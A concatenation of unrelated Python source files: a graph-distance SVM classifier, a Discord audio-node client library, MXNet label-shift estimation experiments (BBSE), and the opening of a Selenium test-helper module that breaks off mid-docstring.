            print('NonConvergenceError for ',x.characterized(),y.characterized())
            similarity=np.nan
            if self.always_raise:
                raise NanErrorInDist
        if np.isnan(similarity) and self.always_raise:
            raise NanErrorInDist
        end=time.time()
        self.similarity_measure_time.append(end-start)
        return similarity
    def gram_matrix(self,X,Y,matrix=None,method='classic'):
        """ Compute the similarity matrix K=exp{-gamma*f(x,y)} with f the similarity measure
        for all x,y in X and Y
        Parameters
        ----------
        X : array of abstract object
        Y : array of abstract object
        matrix : ndarray, optionnal
            If specified used to compute the similarity matrix instead of calculating all the similarities
        method : string
            If equal to classic compute K=exp{-gamma*f(x,y)}, if equal to no_gaussian compute only f(x,y)
        Returns
        -------
        D : ndarray
            The gram matrix of all similarities K=exp{-gamma*f(x,y)} or f(x,y) if method='no_gaussian'.
            NOTE: returns None for any other value of `method`.
        Raises
        ------
        InfiniteException
            If the exponentiated matrix contains non-finite entries.
        """
        self.compute_all_distance(X,Y,matrix)
        if method=='classic':
            Z=np.exp(-self.gamma*(self.D))
            if not self.assert_all_finite(Z):
                raise InfiniteException('There is Nan')
            else:
                return Z
        if method=='no_gaussian':
            return self.D
    def fit(self,X,y=None,matrix=None):
        """ Fit the SVM classifier on the similarity matrix
        Parameters
        ----------
        X : array of abstract object
        y : classes of all objects
        matrix : ndarray, optionnal
            If specified used to compute the similarity matrix instead of calculating all the similarities
        Returns
        -------
        self
        Notes
        -----
        If the Gram matrix contains NaN the fit is silently skipped and
        infiniteExceptionOccuredInFit is set, so a later predict() can
        degrade gracefully instead of raising.
        """
        self.classes_ =np.array(y)
        self._fit_X=np.array(X)
        Gtrain = np.zeros((X.shape[0],X.shape[0]))
        start=time.time()
        try :
            Gtrain = self.gram_matrix(X,X,matrix,method='classic')
            self.svc.fit(Gtrain,self.classes_)
            if self.verbose:
                print('Time fit : ',time.time()-start)
        except InfiniteException:
            self.infiniteExceptionOccuredInFit=True
            print('InfiniteException : value error in fit because nan')
        return self
    def predict(self,X,matrix=None):
        """ Apply the SVM classifier on X
        Parameters
        ----------
        X : array of abstract object
        matrix : ndarray, optionnal
            If specified used to compute the similarity matrix instead of calculating all the similarities
        Returns
        -------
        The predicted classes, or an array filled with -10 when the Gram
        matrix contained NaN (either here or previously during fit).
        """
        try :
            G=self.gram_matrix(X,self._fit_X,matrix,method='classic')
            preds=self.svc.predict(G)
        except InfiniteException:
            print('InfiniteException : Preds error because nan')
            preds=np.repeat(-10,len(X)) # Dirty trick so that preds are not None
        except NotFittedError:
            # (message says: "NaN in the fit Gram matrix but not in the test one")
            if self.infiniteExceptionOccuredInFit :
                print('NotFittedError : nan dans la gram de fit mais pas dans celle de test')
                preds=np.repeat(-10,len(X)) # Dirty trick so that preds are not None
            else:
                raise NotFittedError
        return preds
    def assert_all_finite(self,X):
        """Like assert_all_finite, but only for ndarray.
        Returns False only when X is a float array whose sum is non-finite
        AND which actually contains non-finite entries (mirrors sklearn's
        internal fast-path check — presumably adapted from it; confirm)."""
        X = np.asanyarray(X)
        a=X.dtype.char in np.typecodes['AllFloat']
        b=np.isfinite(X.sum())
        c=np.isfinite(X).all()
        if (a and not b and not c):
            return False
        else :
            return True
    def compute_all_distance(self,X,Y,matrix=None):
        """ Compute all similarities f(x,y) for x,y in X and Y and f the similarity measure
        Parameters
        ----------
        X : array of abstract object
        Y : array of abstract object
        matrix : ndarray, optionnal
            If specified used to compute the similarity matrix instead of calculating all the similarities
        Returns
        -------
        None. Set the similarity matrix self.D
        """
        if matrix is not None :
            self.D=matrix
        else:
            X=X.reshape(X.shape[0],)
            Y=Y.reshape(Y.shape[0],)
            if np.all(X==Y):
                # Symmetric case (train Gram): only compute the upper triangle
                # then mirror it, halving the number of distance evaluations.
                D= np.zeros((X.shape[0], Y.shape[0]))
                H=np.zeros((X.shape[0], Y.shape[0]))
                for i, x1 in enumerate(X):
                    for j,x2 in enumerate(Y):
                        if j>=i:
                            dist=self.compute_similarity(x1, x2)
                            D[i, j] = dist
                np.fill_diagonal(H,np.diagonal(D))
                D=D+D.T-H
            else:
                D = np.zeros((X.shape[0], Y.shape[0]))
                for i, x1 in enumerate(X):
                    row=[self.compute_similarity(x1, x2) for j,x2 in enumerate(Y)]
                    D[i,:]=row
            D[np.abs(D)<=1e-15]=0 #threshold due to numerical precision
            self.D=D
    def set_one_param(self,dicto,key):
        # Set attribute `key` only if present in `dicto` (partial set_params).
        if key in dicto:
            setattr(self, key, dicto[key])
    def get_params(self, deep=True):
        return {"similarity_measure":self.similarity_measure,"gamma":self.gamma,"C":self.C}
    def get_distances_params(self):
        return {"similarity_measure":self.similarity_measure}
    def set_params(self, **parameters):
        self.set_one_param(parameters,"similarity_measure")
        self.set_one_param(parameters,"C")
        self.set_one_param(parameters,"gamma")
        # Rebuild the SVC so a changed C takes effect.
        self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000)
        return self
class Graph_RJW_SVC_Classifier(GenericSVCClassifier):
    """ Graph_RJW_SVC_Classifier is a generic class that inherit from GenericSVCClassifier.
    Attributes
    ----------
    rjw : a RJW_distance instance
        The RJW_distance class for computing RJW
    alpha : float
        The alpha parameter of RJW
    beta : float
        The beta parameter of RJW
    method : string
        The name of the method used to compute the structures matrices of the graphs. See Graph class
    features_metric : string
        The name of the method used to compute the cost matrix between the features
    amijo : bool, optionnal
        If True the steps of the line-search is found via an amijo research. Else closed form is used.
        If there is convergence issues use False.
    wl : integer
        Parameter Weisfeler-Lehman attributes.
    """
    def __init__(self,C=1,gamma=1,alpha=1,beta=0.5,method='random_walk',features_metric='sqeuclidean',
                 verbose=False,always_raise=False,amijo=True,wl=0):
        self.rjw=RJW_distance(alpha=alpha,method=method,features_metric=features_metric,amijo=amijo)
        similarity_measure=self.rjw.graph_d
        self.alpha=alpha
        self.beta=beta
        self.features_metric=features_metric
        self.method=method
        self.wl=wl
        self.amijo=amijo
        # Bug fix: the original called GenericSVCClassifier.__init__ twice;
        # the first call lacked always_raise and was fully superseded by the
        # second, so only the complete call is kept.
        GenericSVCClassifier.__init__(self,C=C,gamma=gamma,similarity_measure=similarity_measure,verbose=verbose,
                                      always_raise=always_raise)
    def fit(self,X,y=None,matrix=None):
        """Ensure every graph's structure matrix matches self.method, then
        delegate to GenericSVCClassifier.fit."""
        self.classes_ = y
        self._fit_X = list(X.reshape(X.shape[0],))
        for x in self._fit_X :
            # Recompute the structure matrix if it is missing or was built
            # with a different method than the one currently configured.
            if x.C is None or x.name_struct_dist!=self.method:
                if self.verbose:
                    print('******************************************************')
                    print('Construction des matrices de structures')
                    if x.C is not None:
                        print('before ',x.name_struct_dist)
                        print('nw ',self.method)
                    else:
                        print('Because structure is None')
                    print('******************************************************')
                _=x.distance_matrix(method=self.method,force_recompute=True)
        super(Graph_RJW_SVC_Classifier,self).fit(X,y,matrix)
    def get_params(self, deep=True):
        return {"alpha":self.alpha
                ,"features_metric":self.features_metric
                ,"method":self.method
                ,"C":self.C
                ,"gamma":self.gamma
                ,"amijo":self.amijo
                ,"wl":self.wl
                }
    def set_params(self, **parameters):
        self.set_one_param(parameters,"alpha")
        self.set_one_param(parameters,"features_metric")
        self.set_one_param(parameters,"method")
        self.set_one_param(parameters,"C")
        self.set_one_param(parameters,"gamma")
        self.set_one_param(parameters,"amijo")
        self.set_one_param(parameters,"wl")
        self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000) # rbf
        rjw2=RJW_distance(alpha=self.alpha,beta=self.beta, method=self.method,
                          features_metric=self.features_metric,
                          amijo=self.amijo)
        if self.rjw.get_tuning_params()!=rjw2.get_tuning_params():
            # NOTE(review): the replacement distance is created without beta
            # while rjw2 above includes it; if beta is part of the tuning
            # params the two can never match — confirm intended behaviour.
            self.rjw=RJW_distance(alpha=self.alpha,method=self.method,features_metric=self.features_metric,
                                  amijo=self.amijo)
            self.similarity_measure=self.rjw.graph_d
        return self
    def get_distances_params(self):
        """Return the parameters identifying the underlying RJW distance."""
        dall = {}
        dall.update(self.rjw.get_tuning_params())
        dall.update({'wl':self.wl})
        return dall
<filename>slate/client.py<gh_stars>0
from __future__ import annotations
import logging
import random
from typing import MutableMapping, Optional, Protocol, Type, Mapping
import aiohttp
import discord
from .bases import BaseNode
from .exceptions import NoNodesAvailable, NodeCreationError, NodeNotFound, PlayerAlreadyExists
from .player import Player
__log__ = logging.getLogger(__name__)
class Client:
    """
    The client used to manage Nodes and Players.
    Parameters
    ----------
    bot: :py:class:`typing.Protocol` [ :py:class:`discord.Client` ]
        The bot instance that this :class:`Client` should be associated with.
    session: :py:class:`typing.Optional` [ :py:class:`aiohttp.ClientSession` ]
        The aiohttp client session used to make requests and connect to websockets with. If not passed, a new client session will be made.
    """
    def __init__(self, *, bot: Protocol[discord.Client], session: Optional[aiohttp.ClientSession] = None) -> None:
        self._bot: Protocol[discord.Client] = bot
        self._session: aiohttp.ClientSession = session or aiohttp.ClientSession()
        # Node identifier -> node instance; populated as nodes are created.
        self._nodes: MutableMapping[str, Protocol[BaseNode]] = {}
    def __repr__(self) -> str:
        return f'<slate.Client node_count={len(self.nodes)} player_count={len(self.players)}>'
    #
    @property
    def bot(self) -> Protocol[discord.Client]:
        """
        :py:class:`Protocol` [ :py:class:`discord.Client` ]:
            The bot instance that this :class:`Client` is connected to.
        """
        return self._bot
    @property
    def session(self) -> aiohttp.ClientSession:
        """
        :py:class:`aiohttp.ClientSession`:
            The aiohttp session used to make requests and connect to Node websockets with.
        """
        return self._session
    #
    @property
    def nodes(self) -> MutableMapping[str, Protocol[BaseNode]]:
        """
        :py:class:`typing.MutableMapping` [ :py:class:`str` , :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]:
            A mapping of Node identifier's to Nodes that this Client is managing.
        """
        return self._nodes
    @property
    def players(self) -> Mapping[int, Protocol[Player]]:
        """
        :py:class:`typing.Mapping` [ :py:class:`int` , :py:class:`typing.Protocol` [ :py:class:`Player`] ]:
            A mapping of Player guild id's to Players across all the nodes that this Client is managing.
        """
        # Flatten every node's player map into one guild-id-keyed view.
        players = []
        for node in self.nodes.values():
            players.extend(node.players.values())
        return {player.guild.id: player for player in players}
    #
    async def create_node(self, *, host: str, port: str, password: str, identifier: str, cls: Type[Protocol[BaseNode]], **kwargs) -> Protocol[BaseNode]:
        """
        Creates a Node and attempts to connect to an external nodes websocket. (:resource:`Andesite <andesite>`, :resource:`Lavalink <lavalink>`, etc)
        Parameters
        ----------
        host: :py:class:`str`
            The host address to attempt connection with.
        port: :py:class:`int`
            The port to attempt connection with.
        password: :py:class:`str`
            The password used for authentification.
        identifier: :py:class:`str`
            A unique identifier used to refer to the created Node.
        cls: :py:class:`typing.Type` [ :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]
            The class used to connect to the external node. Must be a subclass of :py:class:`BaseNode`.
        **kwargs:
            Optional keyword arguments to pass to the created Node.
        Returns
        -------
        :py:class:`typing.Protocol` [ :py:class:`BaseNode` ]
            The Node that was created.
        Raises
        ------
        :py:class:`NodeCreationError`
            Either a Node with the given identifier already exists, or the given class was not a subclass of :py:class:`BaseNode`.
        :py:class:`NodeConnectionError`
            There was an error while connecting to the external node. Could mean there was invalid authorization or an incorrect host address/port, etc.
        """
        await self.bot.wait_until_ready()
        if identifier in self.nodes.keys():
            raise NodeCreationError(f'Node with identifier \'{identifier}\' already exists.')
        if not issubclass(cls, BaseNode):
            raise NodeCreationError(f'The \'node\' argument must be a subclass of \'{BaseNode.__name__}\'.')
        node = cls(client=self, host=host, port=port, password=password, identifier=identifier, **kwargs)
        __log__.debug(f'Node | Attempting \'{node.__class__.__name__}\' connection with identifier \'{identifier}\'.')
        # NOTE(review): the node is returned but never added to self._nodes
        # here — presumably BaseNode.connect() registers itself with this
        # client; confirm, otherwise get_node() will never see it.
        await node.connect()
        return node
    def get_node(self, *, identifier: Optional[str] = None) -> Optional[Protocol[BaseNode]]:
        """
        Returns the Node with the given identifier.
        Parameters
        ----------
        identifier: :py:class:`typing.Optional` [ :py:class:`str` ]
            The identifier of the Node to return. If not passed a random Node will be returned.
        Returns
        -------
        :py:class:`typing.Optional` [ :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]
            The Node that was found. Could return :py:class:`None` if no Nodes with the given identifier were found.
        Raises
        ------
        :py:class:`NoNodesAvailable`
            Raised if there are no Nodes available.
        """
        # Only consider nodes whose websocket is currently connected.
        available_nodes = {identifier: node for identifier, node in self._nodes.items() if node.is_connected}
        if not available_nodes:
            raise NoNodesAvailable('There are no Nodes available.')
        if identifier is None:
            return random.choice([node for node in available_nodes.values()])
        return available_nodes.get(identifier, None)
    async def create_player(self, *, channel: discord.VoiceChannel, node_identifier: Optional[str] = None, cls: Optional[Type[Protocol[Player]]] = Player) -> Protocol[Player]:
        """
        Creates a Player for the given :py:class:`discord.VoiceChannel`.
        Parameters
        ----------
        channel: :py:class:`discord.VoiceChannel`
            The discord voice channel to connect the Player too.
        node_identifier: :py:class:`typing.Optional` [ :py:class:`str` ]
            A Node identifier to create the Player on. If not passed a random Node will be chosen.
        cls: :py:class:`typing.Type` [ :py:class:`typing.Protocol` [ :py:class:`Player` ] ]
            The class used to implement the base Player features. Must be a subclass of :py:class:`Player`. Defaults to the Player supplied with Slate.
        Returns
        -------
        :py:class:`typing.Protocol` [ :py:class:`Player` ]
            The Player that was created.
        Raises
        ------
        :py:class:`NodeNotFound`
            Raised if a Node with the given identifier was not found.
        :py:class:`NoNodesAvailable`
            Raised if there are no Nodes available.
        :py:class:`PlayerAlreadyExists`
            Raised if a Player for the voice channel already exists.
        """
        node = self.get_node(identifier=node_identifier)
        if not node and node_identifier:
            raise NodeNotFound(f'Node with identifier \'{node_identifier}\' was not found.')
        if channel.guild.id in self.players.keys():
            raise PlayerAlreadyExists(f'Player for guild \'{channel.guild!r}\' already exists.')
        __log__.debug(f'PLAYER | Attempting player creation for guild: {channel.guild!r}')
        # discord.py constructs the voice protocol (our Player subclass) and
        # connects it to the channel; we then attach it to the chosen node.
        player = await channel.connect(cls=cls)
        player._node = node
        node._players[channel.guild.id] = player
        return player
    def get_player(self, *, guild: discord.Guild) -> Optional[Protocol[Player]]:
        """
        Returns the Player for the given :py:class:`discord.Guild`.
        Parameters
        ----------
        guild: :py:class:`discord.Guild`
            The discord guild to return the Player for.
        Returns
        -------
        :py:class:`typing.Optional` [ :py:class:`typing.Protocol` [ :py:class:`Player` ] ]
            The Player for the given discord guild. Could be :py:class:`None` if the guild does not already have a Player.
        """
        return self.players.get(guild.id, None)
|
from scipy import stats
from statsmodels.distributions.empirical_distribution import ECDF
import mxnet as mx
import numpy as np
from mxnet import nd, autograd, gluon
# three customized modules
from labelshift import *
from utils4gluon import *
from data_shift import *
from data import *
def correction_experiment(dataset_name=None,
                          tweak_train=None,
                          p_P=None, tweak_test=None, p_Q=None,
                          num_train_samples=None,
                          num_val_samples=None,
                          num_test_samples=None,
                          num_hidden=None,
                          epochs=None,
                          batch_size=None):
    """Run one label-shift correction experiment.

    Trains an MLP on (possibly label-shifted) source data, estimates the
    label-shift importance weights from validation/test predictions, then
    retrains with weighted ERM and compares test accuracy.

    :param dataset_name: name understood by ``load_data``
    :param tweak_train: if truthy, resample train/val data with label dist p_P
    :param p_P: source label distribution used when tweak_train is set
    :param tweak_test: if truthy, resample test data with label dist p_Q
    :param p_Q: target label distribution used when tweak_test is set
    :param num_train_samples / num_val_samples / num_test_samples: resample sizes
    :param num_hidden: hidden width of the two-layer MLP
    :param epochs: training epochs (same for both training phases)
    :param batch_size: batch size for test-set evaluation
    :return: dict with unweighted/weighted accuracies, estimated and true
        weights, error metrics and raw predictions
    """
    # set the context for compute
    ctx = mx.gpu()
    # set the context for data
    data_ctx = mx.gpu()
    # load the dataset
    X, y, Xtest, ytest = load_data(dataset_name)
    n = X.shape[0]
    dfeat = np.prod(X.shape[1:])
    # NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
    num_labels = 10
    ################################################
    # Random permutation of the data
    ################################################
    rand_idx = np.random.permutation(n)
    X = X[rand_idx,...]
    y = y[rand_idx]
    ################################################
    # First split examples between train and validation (50/50)
    ################################################
    num = 2
    Xtrain_source = X[:(n//num),:,:,:]
    ytrain_source = y[:(n//num)]
    Xval_source = X[(n//num):(2*n//num),:,:,:]
    yval_source = y[(n//num):(2*n//num)]
    ################################################
    # Set the label distribution at train time
    ################################################
    if tweak_train:
        # print("Sampling training and validation data from p_P")
        # print("Current p_P: ", p_P)
        Xtrain, ytrain = tweak_dist(Xtrain_source, ytrain_source, num_labels, num_train_samples, p_P)
        Xval, yval = tweak_dist(Xval_source, yval_source, num_labels, num_val_samples, p_P)
    else:
        Xtrain, ytrain = Xtrain_source, ytrain_source
        Xval, yval = Xval_source, yval_source
    ################################################
    # Set the label distribution for test data
    ################################################
    if tweak_test:
        # print("Sampling test data from p_Q")
        # print("Current p_Q: ", p_Q)
        Xtest, ytest = tweak_dist(Xtest, ytest, num_labels, num_test_samples, p_Q)
    ####################################
    # Train on p_P
    ####################################
    net = gluon.nn.HybridSequential()
    with net.name_scope():
        net.add(gluon.nn.Dense(num_hidden, activation="relu"))
        net.add(gluon.nn.Dense(num_hidden, activation="relu"))
        net.add(gluon.nn.Dense(num_labels))
    net.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
    softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
    trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': .1})
    net.hybridize()
    # Training
    weighted_train(net, softmax_cross_entropy, trainer, Xtrain, ytrain, Xval, yval, ctx, dfeat, epoch=epochs, weightfunc=None, data_ctx=data_ctx)
    # Prediction
    ypred_s, ypred_s_soft = predict_all(Xval, net, ctx, dfeat)
    ypred_t, ypred_t_soft = predict_all(Xtest, net, ctx, dfeat)
    # Converting to numpy array for later convenience
    ypred_s= ypred_s.asnumpy()
    ypred_s_soft = ypred_s_soft.asnumpy()
    ypred_t = ypred_t.asnumpy()
    ypred_t_soft = ypred_t_soft.asnumpy()
    ####################################
    # Estimate Wt and Py
    ####################################
    wt = estimate_labelshift_ratio(yval, ypred_s, ypred_t,num_labels)
    Py_est = estimate_target_dist(wt, yval,num_labels)
    Py_true = calculate_marginal(ytest,num_labels)
    Py_base = calculate_marginal(yval,num_labels)
    wt_true = Py_true/Py_base
    print(np.concatenate((wt,wt_true),axis=1))
    print(np.concatenate((Py_est,Py_true),axis=1))
    # print("||wt - wt_true||^2 = " + repr(np.sum((wt-wt_true)**2)/np.linalg.norm(wt_true)**2))
    # print("KL(Py_est|| Py_true) = " + repr(stats.entropy(Py_est,Py_base)))
    ####################################
    # Solve weighted ERM and compare to previously trained models
    ####################################
    data_test = mx.io.NDArrayIter(Xtest, ytest, batch_size, shuffle=False)
    acc_unweighted = evaluate_accuracy(data_test, net, ctx, dfeat)  # in fact, drawing confusion matrix maybe more informative
    print("Accuracy unweighted", acc_unweighted)
    # Clip negative estimated weights to zero before reweighting.
    training_weights=np.maximum(wt, 0)
    wt_ndarray = nd.array(training_weights,ctx=ctx)
    weightfunc = lambda x,y: wt_ndarray[y.asnumpy().astype(int)]
    # Train a model using the following!
    net2 = gluon.nn.HybridSequential()
    with net2.name_scope():
        net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
        net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
        net2.add(gluon.nn.Dense(num_labels))
    net2.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
    trainer2 = gluon.Trainer(net2.collect_params(), 'sgd', {'learning_rate': .1})
    net2.hybridize()
    # NOTE WE ASSUME SAME NUMBER OF EPOCHS IN PERIOD 1 and PERIOD 2
    # Training
    weighted_train(net2, softmax_cross_entropy, trainer2, Xtrain, ytrain,
                   Xval, yval, ctx, dfeat, epoch=epochs, weightfunc=weightfunc, data_ctx=data_ctx)
    data_test.reset()
    acc_weighted = evaluate_accuracy(data_test, net2, ctx, dfeat)
    print("Accuracy weighted", acc_weighted)
    return {"acc_unweighted": acc_unweighted,
            "acc_weighted": acc_weighted,
            "wt": wt,
            "wt_true": wt_true,
            "wt_l2": np.sum((wt-wt_true)**2)/np.linalg.norm(wt_true)**2,
            "kl_div": stats.entropy(Py_est,Py_base),
            "ypred_s": ypred_s,
            "ypred_s_soft": ypred_s_soft,
            # Bug fix: the key was "ypred_t:" (stray colon), inconsistent with
            # every other key and impossible to look up as intended.
            "ypred_t": ypred_t,
            "ypred_t_soft": ypred_t_soft,
            }
def correction_experiment_benchmark(methods, dataset_name=None,
                                    tweak_train=None,
                                    p_P=None, tweak_test=None, p_Q=None,
                                    num_train_samples=None,
                                    num_test_samples=None,
                                    num_hidden=None,
                                    epochs=None,
                                    batch_size=None,
                                    ctx=None, cnn_flag=False):
    """Benchmark a list of label-shift weight-estimation methods on one dataset.

    "methods" is a list of lambda functions that take X, y, X_test (and
    optionally a blackbox predictor f) as inputs and output a "weightvec".
    For example:
    - unweighted training will return a weightvec = the all 1 vector.
    - BBSE will train a classifier with half of the training data, and use the
      other half for estimating.
    - Logistic regression approach will try to predict whether X belongs to
      train or test, and then use the softmax probability for each data set.
    - KunZhang's method will match moments in a hilbert space to get some
      weights (not very scalable.. depends on matlab)

    For each method a weighted classifier is trained from scratch and its test
    accuracy plus (hard and probabilistic) confusion matrices are recorded.

    Returns a dict:
        "acc_list": [[accuracy, confusion_matrix, prob_confusion_matrix], ...]
        "wt_list":  estimated per-class weight vectors, one entry per method.
    """
    # set the context for compute
    if ctx is None:
        ctx = mx.cpu()
    # set the context for data
    data_ctx = ctx
    # load the dataset
    X, y, Xtest, ytest = load_data(dataset_name)
    n = X.shape[0]
    dfeat = np.prod(X.shape[1:])
    # NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
    num_labels = 10
    ################################################
    # Random permutation of the data
    ################################################
    rand_idx = np.random.permutation(n)
    X = X[rand_idx, ...]
    y = y[rand_idx]
    ################################################
    # Tweak the distributions by weighted resampling
    ################################################
    # BUGFIX: previously Xtrain/ytrain were only assigned when tweak_train was
    # truthy, so calling this with tweak_train=False raised a NameError below.
    # Fall back to the raw (permuted) source data when no tweak is requested.
    if tweak_train:
        # print("Sampling training and validation data from p_P")
        # print("Current p_P: ", p_P)
        Xtrain, ytrain = tweak_dist(X, y, num_labels, num_train_samples, p_P)
    else:
        Xtrain, ytrain = X, y
    if tweak_test:
        # print("Sampling test data from p_Q")
        # print("Current p_Q: ", p_Q)
        Xtest, ytest = tweak_dist(Xtest, ytest, num_labels, num_test_samples, p_Q)
    # make sure that the feature is reshaped into a data matrix
    #Xtrain = Xtrain.reshape((-1, dfeat))
    #Xtest = Xtest.reshape((-1,dfeat))
    # Run every estimation method to get its per-example weight vector.
    weightvecs = []
    for func in methods:
        beta = func(Xtrain, ytrain, Xtest)
        weightvecs.append(beta)
    ####################################
    # Get the Q(y)/P(y) for each y. For the sake of comparing weight estimation.
    ####################################
    # This is the importance weight under label-shift
    wt_list = []
    Py_est_list = []
    for beta in weightvecs:
        wt = beta_to_w(beta, ytrain, num_labels)
        wt_list.append(wt)
        Py_est = estimate_target_dist(wt, ytrain, num_labels)
        Py_est_list.append(Py_est)
    ####################################
    # Solve weighted ERM for all methods
    ####################################
    acc_list = []
    softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
    for beta in weightvecs:
        # clip the weights so negative estimates cannot flip the loss sign
        training_weights = np.maximum(beta, 0)
        net2 = gluon.nn.HybridSequential()
        if cnn_flag:
            with net2.name_scope():
                net2.add(gluon.nn.Conv2D(channels=20, kernel_size=5, activation='relu'))
                net2.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
                net2.add(gluon.nn.Conv2D(channels=50, kernel_size=5, activation='relu'))
                net2.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
                # The Flatten layer collapses all axis, except the first one, into one axis.
                net2.add(gluon.nn.Flatten())
                net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
                net2.add(gluon.nn.Dense(num_labels))
        else:
            with net2.name_scope():
                net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
                net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
                net2.add(gluon.nn.Dense(num_labels))
        # force_reinit so parameters are re-drawn for every method in the loop
        net2.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx, force_reinit=True)
        trainer2 = gluon.Trainer(net2.collect_params(), 'sgd', {'learning_rate': .1})
        net2.hybridize()
        # NOTE WE ASSUME SAME NUMBER OF EPOCHS IN PERIOD 1 and PERIOD 2
        # Training
        weighted_train(net2, softmax_cross_entropy, trainer2, Xtrain, ytrain,
                       Xtest, ytest, ctx, dfeat, epoch=epochs, weightvec=training_weights,
                       data_ctx=data_ctx, cnn_flag=cnn_flag)
        # while Xtest and ytest are passed into that, they are not used for training
        data_test = mx.io.NDArrayIter(Xtest, ytest, batch_size, shuffle=False)
        data_test.reset()
        acc_weighted = evaluate_accuracy(data_test, net2, ctx, dfeat, cnn_flag=cnn_flag)
        ypred_t, ypred_t_soft = predict_all(Xtest, net2, ctx, dfeat, cnn_flag=cnn_flag)
        C = confusion_matrix(ytest, ypred_t.asnumpy(), num_labels)
        Cp = confusion_matrix_probabilistic(ytest, ypred_t_soft.asnumpy(), num_labels)
        acc_list.append([acc_weighted, C, Cp])
    for item in acc_list:
        print("Accuracy weighted = ", item[0])
    return {"acc_list": acc_list, "wt_list": wt_list}
def BBSE(X,y,Xtest,ctx=mx.cpu(),num_hidden=256,epochs=5,useProb=False,cnn_flag=False):
    """Black-Box Shift Estimation of label-shift importance weights.

    Splits the labeled source data (X, y) in half, trains a black-box
    classifier on the first half, predicts on the held-out half and on the
    unlabeled target set Xtest, and estimates per-class weights
    w(y) = Q(y)/P(y) from those predictions.  Returns per-example source
    weights via w_to_beta.

    useProb=True uses soft (probability) predictions in the estimator,
    otherwise hard labels.  cnn_flag switches the black-box model between a
    LeNet-style CNN and a two-hidden-layer MLP.
    """
    # set the context for data
    data_ctx = ctx
    n = X.shape[0]
    dfeat = np.prod(X.shape[1:])
    # NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
    num_labels = 10
    ################################################
    # Random permutation of the data
    ################################################
    rand_idx = np.random.permutation(n)
    XX = X[rand_idx, ...]
    yy = y[rand_idx]
    ################################################
    # First split examples between train and validation
    ################################################
    num = 2
    Xtrain = XX[:(n//num),...]
    ytrain = yy[:(n//num)]
    Xval = XX[(n//num):(2*n//num),...]
    yval = yy[(n//num):(2*n//num):]
    ####################################
    # Train on p_P
    ####################################
    net = gluon.nn.HybridSequential()
    if cnn_flag:
        with net.name_scope():
            net.add(gluon.nn.Conv2D(channels=20, kernel_size=5, activation='relu'))
            net.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
            net.add(gluon.nn.Conv2D(channels=50, kernel_size=5, activation='relu'))
            net.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
            # The Flatten layer collapses all axis, except the first one, into one axis.
            net.add(gluon.nn.Flatten())
            net.add(gluon.nn.Dense(num_hidden, activation="relu"))
            net.add(gluon.nn.Dense(num_labels))
    else:
        with net.name_scope():
            net.add(gluon.nn.Dense(num_hidden, activation="relu"))
            net.add(gluon.nn.Dense(num_hidden, activation="relu"))
            net.add(gluon.nn.Dense(num_labels))
    net.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
    softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
    trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': .1})
    net.hybridize()
    # Training (weightfunc=None -> unweighted training of the black box)
    weighted_train(net, softmax_cross_entropy, trainer, Xtrain, ytrain, Xval, yval, ctx, dfeat, epoch=epochs,
                   weightfunc=None, data_ctx=data_ctx, cnn_flag=cnn_flag)
    # Prediction on the held-out source half (s) and on the target set (t)
    ypred_s, ypred_s_soft = predict_all(Xval, net, ctx, dfeat, cnn_flag=cnn_flag)
    ypred_t, ypred_t_soft = predict_all(Xtest, net, ctx, dfeat, cnn_flag=cnn_flag)
    # Converting to numpy array for later convenience
    ypred_s = ypred_s.asnumpy()
    ypred_s_soft = ypred_s_soft.asnumpy()
    ypred_t = ypred_t.asnumpy()
    ypred_t_soft = ypred_t_soft.asnumpy()
    ####################################
    # Estimate Wt
    ####################################
    if useProb:
        wt = estimate_labelshift_ratio(yval, ypred_s_soft, ypred_t_soft, num_labels)
    else:
        wt = estimate_labelshift_ratio(yval, ypred_s, ypred_t, num_labels)
    # NOTE(review): the per-class weights are expanded over the *original*
    # label vector y (not the permuted yy); w_to_beta indexes by class so the
    # ordering does not matter -- confirm against w_to_beta's contract.
    return w_to_beta(wt,y)
'''
Created on 24.05.2014
@author: ionitadaniel19
'''
import logging.config
import os
import json
from xlsmanager import easyExcel
from constants import *
import traceback
import copy
def setup_logging(default_path='logging.json', default_level=logging.INFO,env_key='LOG_CFG'):
    """Configure the logging module from a JSON config file.

    The config file defaults to *default_path* next to this module, but can
    be overridden through the *env_key* environment variable.  When no
    config file exists, falls back to ``logging.basicConfig``.
    """
    config_path = os.getenv(env_key, None)
    if not config_path:
        config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), default_path)
    if not os.path.exists(config_path):
        logging.basicConfig(level=default_level)
        return
    with open(config_path, 'r') as handle:
        logging.config.dictConfig(json.load(handle))
def load_browser_driver(browser_driver_path):
    """Return the absolute path of a browser driver located relative to this module."""
    module_dir = os.path.dirname(os.path.abspath(__file__))
    return os.path.join(module_dir, browser_driver_path)
def get_webdriver_selector_element(element_name):
    """Map a Selenium-IDE style locator string to a (selector_type, element) pair.

    The locator prefix (``css=``, ``xpath=`` or a leading ``//``, ``id=``,
    ``link=``, ``name=`` or no ``=`` at all, ``class=``, ``tag=``) chooses the
